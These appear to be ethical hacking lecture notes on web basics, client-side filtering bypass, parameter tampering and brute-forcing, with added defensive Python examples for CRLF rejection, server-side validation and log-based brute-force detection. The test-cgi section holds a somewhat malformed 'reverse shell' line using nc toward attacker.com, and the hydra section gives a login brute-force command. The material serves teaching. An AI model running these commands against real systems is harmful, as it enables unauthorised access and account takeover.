Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing


Lecture Overview
IN5290 Ethical Hacking
Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Summary:
- how web sites work, the HTTP protocol
- client side and server side actions
- accessing hidden contents
- modifying client side data
- brute-forcing forms and directories
- web parameter tampering

Universitetet i Oslo, Laszlo Erdödi
IN5290 2018 L05 Web hacking 1. 2

Hypertext Transfer Protocol (HTTP)

HTTP is the protocol for web communication. Currently versions 1.0, 1.1 and 2.0 are in use (2.0 has existed since 2015; almost all browsers support it by now). HTTP is used in a client-server model: the client sends a request and receives an answer from the server.

Each request and response consists of a header and a body. The header contains all the necessary and additional information for the HTTP protocol.

Request (client to server): the request header carries the web method (see later), the requested file, the protocol version and the host name; the request body carries the data sent with the request.

Response (server to client): the response header carries the web answer (in the response), the date and the content type; the response body carries the content.

HTTP response splitting

HTTP response splitting is an old vulnerability (it still appears in 2018). If the request is not validated appropriately, the client can provide misleading input (two new lines in the header indicate the end of the header), so a fake header and a fake body end up inside the server's answer. The attacker can force the server to cache a wrong server answer.

[Figure: request header and request body on the client side; on the response side the real response header and body followed by a fake header and fake body]

Hypertext Transfer Protocol (HTTP) - web methods

HTTP operates with several web methods. The main methods in use:
- GET - to download data
- POST - to send data (e.g. "I posted something on Facebook")
Other methods in use:
- HEAD - to obtain the HTTP header only
- PUT - to place content on the server (e.g. RESTful services)
Further existing methods: DELETE (to remove content), TRACE, DEBUG, OPTIONS (to see the list of available web methods)

Hypertext Transfer Protocol - telnet
[Screenshot: an HTTP request typed manually over telnet]

Hypertext Transfer Protocol with browser
The web communication is basically done by the web browsers. The browsers can send optional values, such as content encoding, browser type, etc.
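To make the header/body structure and the response splitting problem concrete, here is an added example that is not part of the lecture slides: a minimal parser for raw HTTP/1.x messages (the header block ends at the first blank line) and the server-side check that rejects CR/LF in a header value taken from user input. The sample request, the redirect target and the names of the functions are all constructed for this example.

```python
# Added example, not from the lecture slides: a minimal parser for raw HTTP/1.x
# messages (header block ends at the first CRLF CRLF) and the header-value check
# that stops HTTP response splitting. All sample messages are constructed here.

def parse_http_message(raw: bytes):
    """Split a raw HTTP message into (start line, header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete message: no blank line ending the header")
    lines = head.split(b"\r\n")
    start_line = lines[0].decode("ascii")
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.decode("ascii").strip().lower()] = value.decode("latin-1").strip()
    return start_line, headers, body


def contains_crlf(value: str) -> bool:
    """True if a value would terminate a header line (or the whole header)."""
    return "\r" in value or "\n" in value


def build_redirect(location: str) -> bytes:
    """Build a 302 response whose Location is taken from (untrusted) input.

    Rejecting CR/LF here is the server-side fix for response splitting: without
    it, a value containing a blank line would end the real header and let the
    sender supply a second, fake response.
    """
    if contains_crlf(location):
        raise ValueError("CR/LF not allowed in a header value")
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


# Constructed sample request, as a browser would send it
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.example.org\r\n"
    b"User-Agent: ExampleBrowser/1.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 19\r\n"
    b"\r\n"
    b"user=john&pw=secret"
)

# Constructed redirect target carrying a CRLF pair, as a splitting attempt would
SPLIT_ATTEMPT = "/home\r\nSet-Cookie: session=injected"


def demo():
    start, headers, body = parse_http_message(SAMPLE_REQUEST)
    print(start, headers["host"], body)
    print(build_redirect("/home"))
    try:
        build_redirect(SPLIT_ATTEMPT)
    except ValueError as err:
        print("rejected:", err)


if __name__ == "__main__":
    demo()
```

The parser stops at the first blank line, which is exactly why a blank line smuggled into a header value is dangerous: everything after it is read as a new body and, for a proxy or cache, possibly as a new response. Web frameworks apply the same CR/LF rejection in their header-setting APIs; the check belongs on the server regardless of what the browser does.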

Hypertext Transfer Protocol - web answers (HTTP status codes)
2xx: Success
  200: OK
  204: No content
3xx: Redirection
  301: Moved permanently
  302: Moved temporarily
  304: Not modified
  305: Use proxy
  308: Permanent redirect
4xx: Client error
  400: Bad request
  403: Forbidden
  404: File not found
  405: Method not allowed
  408: Request timeout
5xx: Server error
  500: Internal server error
  502: Bad gateway
  504: Gateway timeout
  505: HTTP version not supported

HTTP PUT method - upload file
The PUT method was used to place and update website content before FTP. If it is enabled for a folder and the folder is writable, an attacker can take advantage of that vulnerability and upload arbitrary files.

Accessing a webpage
[Figure: client side - operating system, browser (HTML processing, JavaScript execution, Flash execution); HTTP request / HTTP response; server side - operating system, web server app, FTP, other services, server side scripting engine, CMS, DB request / DB response]

Webserver types and configuration
Web server types and applications: Apache, Internet Information Services (IIS, Microsoft), Nginx, Lighttpd, GWS (Google), others.
The web server is an application that is running under an OS. The user that runs the web server should have the least privileges. Never run a web server as root! The web server user has access to its own folder (webroot, e.g. /var/www, c:/inetpub, etc.) and the logging directory.

Webserver configuration
The web server configuration file contains almost all the server settings. The server side script settings (e.g. where the PHP binary is), the index file extensions (in which order the default page should be considered, e.g. 1. index.php, 2. index.htm) and the default error messages (404 File not found page) have to be placed inside the conf file.
[Screenshot: apache2.conf example]

Webserver configuration (.htaccess)
An .htaccess file is a way to configure the details of your website without altering the server config files. Main functions:
- mod_rewrite (a very powerful and sophisticated module which provides a way to do URL manipulations)
- Authentication (require a password to access certain sections of the webpage)
- Custom error pages (e.g. for 400 Bad request, 404 File not found, 500 Internal Server Error)
- MIME types (add extra application files, e.g. special audio)
- Server Side Includes (for updating common scripts of web pages)

Client side - how the browser processes the HTML
When the browser downloads the HTML file it is processed. The HTML can contain additional files:
- Pictures (usually png, jpg, gif)
- Stylesheets (css)
- JavaScript code
- Flash objects (swf)
All additional content has an access address (local or global). During the processing all the additional content is retrieved from the server with a separate web request.

Tamper Data Firefox addon
Tamper Data is a Firefox addon that is able to show all packets crossing the browser with their details. The main function is to view and modify the HTTP/HTTPS header and POST data. Unfortunately Firefox Quantum does not support it, but there are other alternatives.

Client side - how the browser processes the HTML
The index.html of uio.no contains several pictures, stylesheets and JavaScript code. The browser downloads all of them step by step.

Client side code
[Screenshot: HTML example from uio.no showing inserted JavaScript, a reference to a picture and a reference to a JavaScript file; style sheet example from uio.no]

JavaScript
Alongside HTML and CSS, JavaScript is one of the three core technologies of the World Wide Web. JavaScript enables interactive web pages and thus is an essential part of web applications. The vast majority of websites use it, and all major web browsers have a dedicated JavaScript engine to execute it. As a multi-paradigm language, JavaScript supports event-driven, functional, and imperative (including object-oriented and prototype-based) programming styles. It has an API for working with text, arrays, dates, regular expressions, and basic manipulation of the DOM, but the language itself does not include any I/O, such as networking, storage, or graphics facilities, relying for these upon the host environment in which it is embedded.
Example:
<script>alert("Hi! I'm the JavaScript Engine!");</script>

Flash
Flash is a platform for viewing multimedia contents, executing rich Internet applications, and streaming audio and video. It can be embedded into web sites.
[Screenshots: swf source example, embedding a Flash object, Flash code example]

Server side scripts
Server side scripts are executed on the server side. Many languages exist: PHP, Perl, Ruby, Java, ASP, etc. After the execution a static HTML is generated and that is sent to the client.

PHP examples (PHP to HTML):

<?php print("<h1>Hello John!</h1>"); ?>
-> <h1>Hello John!</h1>

<?php
// mysql_fetch_array() returns one row as an array, so the name is read from it
$result = mysql_query("SELECT name FROM users WHERE id=115");
$row = mysql_fetch_array($result);
print("<h1>Hello " . $row['name'] . "!</h1>");
?>
-> <h1>Hello John!</h1>

Content Management Systems (CMS)
CMS are designed to create and modify the content of web pages easily. The features of a CMS include web-based publishing, format management, history editing and version control, indexing, search, and retrieval. Typical CMS: Joomla, Drupal, WordPress. If a vulnerability of a CMS appears, millions of websites can suddenly be vulnerable.

Start compromising a website
- First use it in a normal way (find the linked subsites, contents, input fields)
- Decide whether it is a simple static site or it has complex dynamic content (server side scripts, database behind)
- Try to find not intended content (comments in the source code)
- Try to find hidden content without a link (factory default folders, user folders, configuration files)
- Try to obtain as much info as possible (information disclosures)
- Force the site to error (invalid inputs) and see the result

Information disclosure
Example 1: Find the hidden information (flag) on the following site: http://193.225.218.118/ctf/flag1
Example 2: Find the hidden information (flag) on the following site: http://193.225.218.118/cybersmart/info2

Prohibited content for search engines - robots.txt
robots.txt is a file that has to be placed in the webroot folder. Search engine robots read the file and process all the disallowed entries. On the other hand it is an information disclosure: it also means that the listed entities exist.

Dangerous default scripts: e.g. cgi-bin/test-cgi
cgi-bin is a protocol to execute programs through the Apache web server. test-cgi is a default file. The current directory content can be listed with it:
GET /cgi-bin/test-cgi?*
The root directory:
GET /cgi-bin/test-cgi?/*
Execute command with pipe (reverse shell):
"GET /cgi-bin/test-cgi?/*" nc attacker.com 80

Directory brute-force / dirb
Different web servers use different default folders and default files. Dirb has collections of typical webserver related folder names. Dirb also has unified dictionaries (big.txt, common.txt, etc.). Dirb brute-forces the folders and files using the dictionaries.
Example: Use dirb to find hidden content on http://193.225.218.118

Client side filtering
Input filtering can be done on the client side. Client side input filtering is not input validation! Any data on the client side can be modified (it is my browser, I can decide what data will be sent out). Typical input filtering:
- Form elements with restrictions (max length of input, restriction for special characters, only special characters are allowed, predefined input options e.g. radio button, combo box)
- JavaScript filtering (the JavaScript is running on the client side, so more complex validation can be done)
Client side filtering can be bypassed easily, which practically means it adds no security.

Web developer extension
The Web Developer extension provides several features to modify the client side appearance. It can modify the form elements, disable JavaScript, remove validations, etc.
Example: Find the flag on this site: http://193.225.218.118/ctf/flag4 Use the Web Developer extension!

Tamper Data - modifying outgoing traffic
Tamper Data is also for modifying the outgoing traffic. By clicking on the "Start Tamper" button we can intercept the traffic and modify the outgoing requests.

Chrome - Postman
Postman Interceptor can set custom headers (including cookies) and view cookies already set on the domain.
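The consequence of "client side filtering is not input validation" is that every restriction a form shows in the browser has to be checked again on the server. The following added example (not from the lecture slides) shows such a server-side copy of typical form restrictions: a maximum length, an allowed character set and a fixed set of radio/combo options. The field names, rules and the two sample submissions are constructed for the demonstration; the tampered one is what a request might look like after the browser-side checks were removed with a tool such as the Web Developer extension or Tamper Data.

```python
# Added example, not from the lecture slides: the restrictions a form enforces in
# the browser (maxlength, allowed characters, a fixed set of radio/combo options)
# applied again on the server. Field names and rules are constructed for the demo.
import re

FORM_RULES = {
    "username": {"max_length": 16, "pattern": re.compile(r"[A-Za-z0-9_]+")},
    "zip":      {"max_length": 5,  "pattern": re.compile(r"[0-9]{4,5}")},
    "shipping": {"choices": {"standard", "express"}},
}


def validate_form(fields: dict) -> dict:
    """Return {field: reason} for every violated rule; an empty dict means valid.

    The same checks may run in JavaScript for usability, but only this copy
    counts: the client can drop or edit anything before the request is sent.
    """
    errors = {}
    for name, rule in FORM_RULES.items():
        value = fields.get(name)
        if value is None:
            errors[name] = "missing"
        elif "max_length" in rule and len(value) > rule["max_length"]:
            errors[name] = "too long"
        elif "pattern" in rule and not rule["pattern"].fullmatch(value):
            errors[name] = "invalid characters"
        elif "choices" in rule and value not in rule["choices"]:
            errors[name] = "not an offered option"
    # Parameters the form never had are a sign of tampering, not of a new feature
    for name in set(fields) - set(FORM_RULES):
        errors[name] = "unexpected field"
    return errors


# Constructed submissions: one as the browser's form produces it, one as a
# proxy-edited request might arrive after the client-side checks were removed.
NORMAL = {"username": "john_doe", "zip": "0316", "shipping": "express"}
TAMPERED = {"username": "a" * 40, "zip": "03-16", "shipping": "free", "is_admin": "1"}

if __name__ == "__main__":
    print(validate_form(NORMAL))    # {}
    print(validate_form(TAMPERED))
```

Note the last loop: a predefined option list (radio button, combo box) does not limit what arrives at the server, and neither does the set of fields the form displays, so unexpected parameters are rejected rather than silently accepted.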

Burp Suite
Burp Suite is a tool for testing web application security. It provides a proxy server and several features to smart-alter the web traffic. For example every packet can be resent by the Repeater module and edited beforehand at byte level. Any client side validation can be bypassed with Burp.

Brute force with hydra
Hydra can be used for HTTP brute-forcing as well. Similarly to the previously discussed protocols, the username (or username file) and the password (or password file) have to be provided. Contrary to the previous cases, Hydra needs a keyword to identify negative answers (reverse brute-force).
Example:
hydra -l username -P passwordfile url.to.bf http-post-form "/portal/xlogin/:ed=^user^&pw=^pass^:f=invalid"
Practice example: Find valid usernames for the form here: http://193.225.218.118/hydra.php

End of lecture
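From the defender's side, a form brute-force like the hydra run above leaves a clear trace in the web server's access log. The following added example (not part of the lecture) detects it from constructed log lines in the Apache Combined Log format. Because a reverse brute-force matches a keyword such as "invalid" in the page, every attempt gets the same 200 status, so the detection counts POSTs to the login URL per client in a sliding time window instead of relying on status codes. The log lines, addresses, path and thresholds are all constructed for the example.

```python
# Added example, not from the lecture slides: spotting an HTTP form brute-force
# like the hydra run above in web server access logs. A reverse brute-force (hydra
# matching an "invalid" keyword in the page) gets the same 200 status for every
# attempt, so the detection keys on request rate to the login URL per client,
# not on status codes. Log lines below are constructed in the Combined Log format.
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def find_bruteforce(lines, login_path, window=timedelta(seconds=60), threshold=10):
    """Return {ip: peak} for clients with more than `threshold` POSTs to
    login_path inside any sliding window of length `window`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            posts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            # Slide the window start forward until it spans at most `window`
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, second, method="POST", path="/portal/xlogin/", status=200):
    """Build a constructed log line (documentation-range addresses, fixed date)."""
    return f'{ip} - - [04/Sep/2018:10:00:{second:02d} +0200] "{method} {path} HTTP/1.1" {status} 512'


# Constructed log: a normal user with two login POSTs, and one client sending
# twelve POSTs to the login form within about 20 seconds.
SAMPLE_LOG = (
    [_line("198.51.100.4", 1), _line("198.51.100.4", 5, "GET", "/portal/")]
    + [_line("203.0.113.7", 10 + 2 * i) for i in range(12)]
    + [_line("198.51.100.4", 40)]
)

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG, "/portal/xlogin/"))  # {'203.0.113.7': 12}
```

The window and threshold are tuning knobs: a single public portal with many legitimate logins needs a higher threshold than an admin form, and a slow brute-force spread over hours needs a longer window. Rate limiting or account lockout on the login handler is the matching mitigation; this script only shows how the behaviour becomes visible in the logs.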